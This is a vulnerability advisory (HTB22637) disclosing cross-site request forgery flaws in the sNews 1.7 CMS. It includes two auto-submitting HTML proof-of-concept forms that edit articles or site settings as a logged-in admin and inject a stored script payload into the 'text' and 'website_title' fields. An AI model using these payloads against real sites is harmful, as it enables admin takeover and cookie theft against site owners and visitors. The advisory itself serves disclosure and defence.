Total Tests:

Cross-site Request Forgery (CSRF) Vulnerabilities in sNews

Advisory ID:HTB22637
Product:sNews
Vendor:sNews Team
Vulnerable Versions:1.7 and probably prior
Tested Version:1.7
Advisory Publication:October 5, 2010 [without technical details]
Vendor Notification:October 5, 2010
Public Disclosure:October 19, 2010
Vulnerability Type:Cross-Site Request Forgery [CWE-352]
Risk Level:Medium
CVSSv2 Base Score:4 (AV:N/AC:H/Au:N/C:N/I:P/A:P)
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in sNews which could be exploited to perform cross-site request forgery attacks.

1) Cross-site request forgery (CSRF) in sNews
1.1 The vulnerability exists due to insufficient validation of the request origin in snews.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and edit articles. Due to insufficient sanitation of input data in the "text" parameter it is also possible to store and execute arbitrary HTML and script code in user`s browser in context of vulnerable website.
Exploitation example:
<form action="http://host/?action=process&task=admin_article&id=2" method="post" name="main" >
<input type="hidden" name="title" value="article title" />
<input type="hidden" name="seftitle" value="sefurl" />
<input type="hidden" name="text" value='article text"><script>alert(document.cookie)</script>' />
<input type="hidden" name="define_category" value="1" />
<input type="hidden" name="publish_article" value="on" />
<input type="hidden" name="position" value="1" />
<input type="hidden" name="description_meta" value="desc" />
<input type="hidden" name="keywords_meta" value="key" />
<input type="hidden" name="display_title" value="on" />
<input type="hidden" name="display_info" value="on" />
<input type="hidden" name="fposting_day" value="29" />
<input type="hidden" name="fposting_month" value="9" />
<input type="hidden" name="fposting_year" value="2010" />
<input type="hidden" name="fposting_hour" value="16" />
<input type="hidden" name="fposting_minute" value="40" />
<input type="hidden" name="task" value="admin_article" />
<input type="hidden" name="edit_article" value="Edit" />
<input type="hidden" name="article_category" value="1" />
<input type="hidden" name="id" value="2" />
</form>
<script>
document.main.submit();
</script>

1.2 The vulnerability exists due to insufficient validation of the request origin in snews.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and edit website settings. Due to insufficient sanitation of input data in the "website_title" parameter it is also possible to store and execute arbitrary HTML and script code in user`s browser in context of vulnerable website.
Exploitation example:
<form action="http://host/?action=process&task=save_settings" method="post" name="main" >
<input type="hidden" name="website_title" value='sNews 1.7"><script>alert(document.cookie)</script>'>
<input type="hidden" name="home_sef" value="home">
<input type="hidden" name="website_description" value="sNews CMS">
<input type="hidden" name="website_keywords" value="snews">
<input type="hidden" name="website_email" value="info@mydomain.com">
<input type="hidden" name="contact_subject" value="Contact Form">
<input type="hidden" name="language" value="EN">
<input type="hidden" name="charset" value="UTF-8">
<input type="hidden" name="date_format" value="d.m.Y.+H:i">
<input type="hidden" name="article_limit" value="3">
<input type="hidden" name="rss_limit" value="5">
<input type="hidden" name="display_page" value="0">
<input type="hidden" name="num_categories" value="on">
<input type="hidden" name="file_ext" value="phps,php,txt,inc,htm,html">
<input type="hidden" name="allowed_file" value="php,htm,html,txt,inc,css,js,swf">
<input type="hidden" name="allowed_img" value="gif,jpg,jpeg,png">
<input type="hidden" name="comment_repost_timer" value="20">
<input type="hidden" name="comments_order" value="ASC">
<input type="hidden" name="comment_limit" value="30">
<input type="hidden" name="word_filter_file" value="">
<input type="hidden" name="word_filter_change" value="">
<input type="hidden" name="save" value="Save">
</form>
<script>
document.main.submit();
</script>

How to Detect Cross-Site Request Forgery Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Currently we are not aware of any vendor-supplied patches or other solutions. The vendor was contacted in accordance to our Vendor Notification Policy but we didn't get any answer or feedback.


References:
[1] High-Tech Bridge Advisory HTB22637 - https://www.immuniweb.com/advisory/HTB22637 - Cross-site Request Forgery (CSRF) Vulnerabilities in sNews
[2] sNews - www.snewscms.com - sNews is a completely free, standards compliant, PHP and MySQL driven Content Management System.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential